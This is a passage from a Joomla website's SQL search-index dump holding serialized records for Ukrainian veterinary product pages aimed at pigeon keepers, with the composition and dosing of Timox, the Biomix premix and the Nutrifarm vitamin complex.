00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4604,'index.php?option=com_content&view=article&id=2458','index.php?option=com_content&view=article&id=2458:timoks-kompleksnij-preparat&catid=135','Тімокс - комплексний препарат',' Опис: Порошок жовтого кольору із специфічним запахом. Склад: 1 г містить діючі речовини: метронідазол 20 мг; тіамулін гідроген фумарат 50 мг; окситетрациклін гідрохлорид 60 мг. Допоміжна речовина: глюкоза. Фармакологiчнi властивостi: Окситетрациклін - антибіотик широкого спектру дії, ефективний проти аеробних грам-позитивних та грам-негативних бактерій, а також деяких анаеробів, хламідій (Chlamidia spp.), мікоплазм (Mycoplasma spp.), деяких простіших та рикетсій (Rickettsia spp.). Спектр дії поширюється також на Actinobacillus spp., E. сoli, Klebsiella spp., Pasteurella spp., Salmonella spp., Staphylococcus spp., Streptococcus spp.. Тіамулін діє бактеріостатично щодо мікоплазм (Mycoplasma spp.), спірохет (Serpulina spp.), хламідій (Chlamydia spp.), Pasteurella multocida, Staphylococcus spp., Streptococcus spp.. Метронідазол ефективний проти Eimeria spp., Histomonas meleagridis, Trichomonas columbae, T.gallinae, лямблій ( Lamblia intestinalis) та амеби. Застосування: Для профілактики та лікування у голубів та декоративних птахів гістомонозу, еймеріозу, сальмонельозу, тріхомонозу та первинних і вторинних інфекцій, зумовлених мікроорганізмами, чутливими до дії комбінації метронідазолу, окситетрацикліну та тіамуліну. Дозування: Препарат задають усуміші з водою груповим способом у дозі 1-2 г препарату на 1 л води щоденно протягом 5-6 діб. ','2020-09-02 09:45:26','693ff2768062d2918c15048172bbea62',1,1,1,'*','2020-09-02 06:41:29','0000-00-00 00:00:00','2020-09-02 06:41:29','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2458\";s:5:\"alias\";s:27:\"timoks-kompleksnij-preparat\";s:7:\"summary\";s:2523:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/timox1.jpg\"><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/timox1.jpg\" width=\"439\"></a></p><p>Опис:<br>  Порошок жовтого кольору із специфічним запахом.<br><br>  Склад:<br>  1 г містить діючі речовини:<br><strong>  метронідазол 20 мг;<br>  тіамулін гідроген фумарат 50 мг;<br>  окситетрациклін гідрохлорид 60 мг.<br>  Допоміжна речовина: глюкоза.</strong><br><br><strong>  Фармакологiчнi властивостi:</strong><br>  Окситетрациклін - антибіотик широкого спектру дії, ефективний  проти аеробних грам-позитивних та грам-негативних бактерій, а також деяких  анаеробів, хламідій (Chlamidia spp.), мікоплазм (Mycoplasma spp.), деяких простіших та рикетсій (Rickettsia spp.). Спектр дії поширюється  також на Actinobacillus spp., E. сoli, Klebsiella spp., Pasteurella spp., Salmonella spp., Staphylococcus spp., Streptococcus spp..<br>  Тіамулін діє бактеріостатично щодо мікоплазм (Mycoplasma spp.), спірохет (Serpulina spp.), хламідій (Chlamydia spp.), Pasteurella multocida, Staphylococcus spp., Streptococcus spp..<br>  Метронідазол ефективний проти Eimeria spp., Histomonas meleagridis, Trichomonas columbae, T.gallinae, лямблій ( Lamblia intestinalis) та амеби.<br><strong>Застосування:</strong><br>  Для профілактики та лікування у голубів та декоративних  птахів гістомонозу, еймеріозу, сальмонельозу, тріхомонозу та первинних і  вторинних інфекцій, зумовлених мікроорганізмами, чутливими до дії комбінації  метронідазолу, окситетрацикліну та тіамуліну.<br><strong>Дозування:</strong><br><strong><u>  Препарат задають у суміші з водою груповим способом у дозі  1-2 г препарату на 1 л води щоденно протягом 5-6 діб.</u></strong></p>\";s:4:\"body\";s:1080:\"<p><br></p><p>Протипоказання:</p><p>  Не застосовувати продуктивним тваринам.</p><p>  Не застосовувати м´ясо та продукцію тварин та птиці  призначених для використання в їжу людиною.</p><p>  Підвищена індивідуальна чутливість до окситетрацикліну,  метронідазолу та тіамуліну.</p><p>Форма  випуску:</p><p>  Фольговані пакети по 10, 100, 200 г.</p><p>Зберігання:</p><p>  Сухе темне, недоступне для дітей місце за температури від 5°  до 25°С.</p><p>Термін  придатності:</p><p>  2 роки.</p><p>  Для застосування у ветеринарній медицині!</p><p>Виробник  готового продукту:</p><p>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p><p><br></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 06:45:26\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:32:\"2458:timoks-kompleksnij-preparat\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:76:\"/index.php/holuby/informatsiia-holubivnykam/2458-timoks-kompleksnij-preparat\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2458\";s:5:\"route\";s:87:\"index.php?option=com_content&view=article&id=2458:timoks-kompleksnij-preparat&catid=135\";s:5:\"title\";s:54:\"Тімокс - комплексний препарат\";s:11:\"description\";s:2155:\" Опис: Порошок жовтого кольору із специфічним запахом. Склад: 1 г містить діючі речовини: метронідазол 20 мг; тіамулін гідроген фумарат 50 мг; окситетрациклін гідрохлорид 60 мг. Допоміжна речовина: глюкоза. Фармакологiчнi властивостi: Окситетрациклін - антибіотик широкого спектру дії, ефективний проти аеробних грам-позитивних та грам-негативних бактерій, а також деяких анаеробів, хламідій (Chlamidia spp.), мікоплазм (Mycoplasma spp.), деяких простіших та рикетсій (Rickettsia spp.). Спектр дії поширюється також на Actinobacillus spp., E. сoli, Klebsiella spp., Pasteurella spp., Salmonella spp., Staphylococcus spp., Streptococcus spp.. Тіамулін діє бактеріостатично щодо мікоплазм (Mycoplasma spp.), спірохет (Serpulina spp.), хламідій (Chlamydia spp.), Pasteurella multocida, Staphylococcus spp., Streptococcus spp.. Метронідазол ефективний проти Eimeria spp., Histomonas meleagridis, Trichomonas columbae, T.gallinae, лямблій ( Lamblia intestinalis) та амеби. Застосування: Для профілактики та лікування у голубів та декоративних птахів гістомонозу, еймеріозу, сальмонельозу, тріхомонозу та первинних і вторинних інфекцій, зумовлених мікроорганізмами, чутливими до дії комбінації метронідазолу, окситетрацикліну та тіамуліну. Дозування: Препарат задають усуміші з водою груповим способом у дозі 1-2 г препарату на 1 л води щоденно протягом 5-6 діб. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 06:41:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 06:41:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4608,'index.php?option=com_content&view=article&id=2457','index.php?option=com_content&view=article&id=2457:biomiks-premiks-dlya-golubiv-vitaminnij&catid=135','\"Біомікс\" премікс для голубів вітамінний',' Комплекс життєво необхідних вітамінів мікро- та макроелементів у фізіологічно оптимальному співвідношенні. Компоненти преміксу сприяють підвищенню стійкості до хвороб, кращому засвоєнню поживних речовин і розвитку птахів за всіма найважливішими показниками, нормалізації обміну речовин, посиленню життєздатності молодняка голубів, формуванню кісткової системи та покращенню пір\'яного покриву. Бренд:ППФ \"Фарматон\" Лікарська форма випуску: Порошок Опис: Однорідна сипуча суміш без ознак та запаху плісняви. Склад: 1 кг преміксу містить: ','2020-09-02 09:50:06','b5cd1933f864456c7c1d2756b890e42c',1,1,1,'*','2020-09-02 06:34:57','0000-00-00 00:00:00','2020-09-02 06:34:57','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2457\";s:5:\"alias\";s:39:\"biomiks-premiks-dlya-golubiv-vitaminnij\";s:7:\"summary\";s:1252:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/biomix1.jpg\"><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/biomix1.jpg\" width=\"377\"></a></p><p style=\"text-align: left;\">Комплекс життєво необхідних вітамінів мікро- та  макроелементів у фізіологічно оптимальному співвідношенні. Компоненти преміксу  сприяють підвищенню стійкості до хвороб, кращому засвоєнню поживних речовин і  розвитку птахів за всіма найважливішими показниками, нормалізації обміну  речовин, посиленню життєздатності молодняка голубів, формуванню кісткової  системи та покращенню пір\'яного покриву.</p><p>Бренд:ППФ \"Фарматон\"</p><p>Лікарська форма випуску: Порошок</p><p>Опис:<br>  Однорідна сипуча суміш без ознак та запаху  плісняви.<br><br>  Склад:<br>  1 кг преміксу містить:</p>\";s:4:\"body\";s:3956:\"<p><br></p><table><tbody><tr><td><p>Вітамін А</p></td><td><p>200 000 Од.</p></td></tr><tr><td><p>Вітамін Д3</p></td><td><p>20 000 Од.</p></td></tr><tr><td><p>Вітамін Е</p></td><td><p>100 мг</p></td></tr><tr><td><p>Вітамін К3</p></td><td><p>50 мг</p></td></tr><tr><td><p>Вітамін В1</p></td><td><p>90 мг</p></td></tr><tr><td><p>Вітамін В2</p></td><td><p>80 мг</p></td></tr><tr><td><p>Вітамін В6</p></td><td><p>50 мг</p></td></tr><tr><td><p>Вітамін В12</p></td><td><p>0,2 мг</p></td></tr><tr><td><p>Кальпан</p></td><td><p>520 мг</p></td></tr><tr><td><p>Нікотинова кислота</p></td><td><p>200 мг</p></td></tr><tr><td><p>Вітамін С</p></td><td><p>500 мг</p></td></tr><tr><td><p>Бетафін</p></td><td><p>2000 мг</p></td></tr><tr><td><p>Фолієва кислота</p></td><td><p>40 мг</p></td></tr><tr><td><p>Біотин</p></td><td><p>4 мг</p></td></tr><tr><td><p>Сірка</p></td><td><p>1200 мг</p></td></tr><tr><td><p>Цинк</p></td><td><p>800 мг</p></td></tr><tr><td><p>Мідь</p></td><td><p>100 мг</p></td></tr><tr><td><p>Залізо</p></td><td><p>4000 мг</p></td></tr><tr><td><p>Йод</p></td><td><p>25 мг</p></td></tr><tr><td><p>Марганець</p></td><td><p>1200 мг</p></td></tr><tr><td><p>Кобальт</p></td><td><p>40 мг</p></td></tr><tr><td><p>Кальцій</p></td><td><p>32,00%</p></td></tr><tr><td><p>Фосфор</p></td><td><p>0,35%</p></td></tr></tbody></table><p>Властивостi: Комплекс життєво необхідних  вітамінів мікро- та макроелементів у фізіологічно оптимальному співвідношенні.  Компоненти преміксу сприяють підвищенню стійкості до хвороб, кращому засвоєнню  поживних речовин і розвитку птахів за всіма найважливішими показниками,  нормалізації обміну речовин, осиленню життєздатності молодняка голубів,  формуванню кісткової системи та покращенню пір\'яного покриву.<br>  Застосування:<br>  Рекомендовано застосовувати для оштово-спортивних,  статних, ігрових, короткодзьобих, високольотних та інших порід голубів.<br><strong>  Дозування:</strong><br><strong>  1 варіант</strong>: засипати в невелику ємність годівницю)  для вільного доступу голубів протягом року. Регулярно поновлювати запас  преміксу та утримувати його в сухому стані.<br><strong>  2 варіант</strong>: задавати 30 г (2 ст. ложки) преміксу  на 1 кг зерносуміші. Протягом періоду розведення і линьки збагачену зерносуміш  задавати 3 рази на тиждень, а в період змагань — 2 рази на тиждень.<br>  Протипоказання: Не має.<br>  Зберiгання:<br>  В сухому місці при температурі від - 0°С до  30°С.<br>  Форма випуску: Пакети з ламінованого паперу та плівки поліетиленової  по 200, 1000 г.<br>  Термін придатності: 12 місяців з дня виготовлення.<br>  Для застосування у ветеринарній медицині!<br>  Виробник продукту:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне,  вул. Дворецька, 89.</p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-02 06:50:06\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"8\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:44:\"2457:biomiks-premiks-dlya-golubiv-vitaminnij\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:88:\"/index.php/holuby/informatsiia-holubivnykam/2457-biomiks-premiks-dlya-golubiv-vitaminnij\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2457\";s:5:\"route\";s:99:\"index.php?option=com_content&view=article&id=2457:biomiks-premiks-dlya-golubiv-vitaminnij&catid=135\";s:5:\"title\";s:74:\"\"Біомікс\" премікс для голубів вітамінний\";s:11:\"description\";s:993:\" Комплекс життєво необхідних вітамінів мікро- та макроелементів у фізіологічно оптимальному співвідношенні. Компоненти преміксу сприяють підвищенню стійкості до хвороб, кращому засвоєнню поживних речовин і розвитку птахів за всіма найважливішими показниками, нормалізації обміну речовин, посиленню життєздатності молодняка голубів, формуванню кісткової системи та покращенню пір\'яного покриву. Бренд:ППФ \"Фарматон\" Лікарська форма випуску: Порошок Опис: Однорідна сипуча суміш без ознак та запаху плісняви. Склад: 1 кг преміксу містить: \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-02 06:34:57\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-02 06:34:57\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4614,'index.php?option=com_content&view=article&id=2459','index.php?option=com_content&view=article&id=2459:vitaminnij-kompleks-nutrifarm&catid=135','Вітамінний комплекс НУТРІФАРМ',' Опис: Однорідний сипучий порошок від жовтого до світло-коричневого кольору із специфічним запахом, що розчиняється у воді. Склад: 1 кг порошка містить: вітамін А (ретинол) —10 000 000 Од; вітамін Д3 (холекальциферол) — 700 000 Од; вітамін Е (токоферол ацетат) - 5500 мг; вітамін К3 (менадіон) - 1750 мг; вітамін С (аскорбінова кислота) — 20 000 мг; вітамін В1 (тіамін) — 1250 мг; вітамін В2 (рибофлавін) — 2500 мг; вітамін В3 (нікотинова кислота) — 18 000 мг; вітамін В5 (пантотенова кислота) — 6000 мг; вітамін В6 (піридоксин) — 2000 мг; вітамін В9 (фолієва кислота) 400 мг; вітамін В12 (ціанокобаламін) — 7,5 мг; лізин — 4000 мг; метіонін — 4000 мг; триптофан —600 мг; селен — 33 мг. лактозу. Фармакологiчнi властивостi: Властивості водорозчинного вітамінно-амінокислотного концентрату зумовлені наявністю вітамінів, амінокислот та селену, які входять до його складу. Вітаміни відіграють роль каталізаторів в організмі тварин. Незамінні амінокислоти необхідні для синтезу білка. Селен бере участь в метаболізмі тиреоїдних гормонів, гормонів щитовидної залози, які необхідні для росту і диференціації всіх клітин в організмі (факторрозвитку), підвищує резистентність організму до несприятливих факторів навколишнього середовища та попереджує пошкодження клітин, зумовлене процесом окислення. Концентрат активізує окисно-відновні реакції, процеси кровотворення, підвищує засвоюваність кормів, яйценоскість, нормалізує обмін речовин, забезпечує високий темп розвитку молодняка та покращення стану його здоров\'я, знижує падіж, підтримує продуктивність сількогосподарських тварин і птиці на високому рівні при стресових ситуаціях. Застосування: Нутріфарм застосовують для профілактики та лікування гіповітамінозів, зниження впливу на організм тварин і птиці стрес-факторів різного походження, при порушеннях метаболізму в печінці, при захворюваннях, спричинених недостатністю селену і амінокислот в кормах, для стимуляції імунної системи під час вакцинації, підвищення продуктивності і ефективності використання кормів, підвищення статевої активності самців та збільшення тривалості використання маточного поголів\'я. Дозування: Перорально з питною водою або у суміші з кормом у дозах: домашній птиці розчин задаютьгруповим способом, для чого розчиняють концентрат у питній воді у співвідношенні 1 г на 2 л питної води і випоюють розчин протягом доби, що достатньо для 12 курей, 20 бройлерів або гусей, 20-25 курчат, 5 індиків; поросятам (віком 2-4 місяці) 0,4-0,8 г на голову; ягнятам і козлятам 0,5-0,8 г на голову; телятам і лошатам 2-3 г на голову; хрякам 5-10 г на голову. Концентрат в зазначених дозах розчиняють у воді чи у суміші з кормом та задають тварині протягом доби. Розчин готують кожного дня, суміш з кормом можна підготувати заздалегідь та використовують з профілактичною метою протягом 3-7 днів; з лікувальною протягом 5-10 днів. Протипоказання: Не використовувати в місцевостях, де 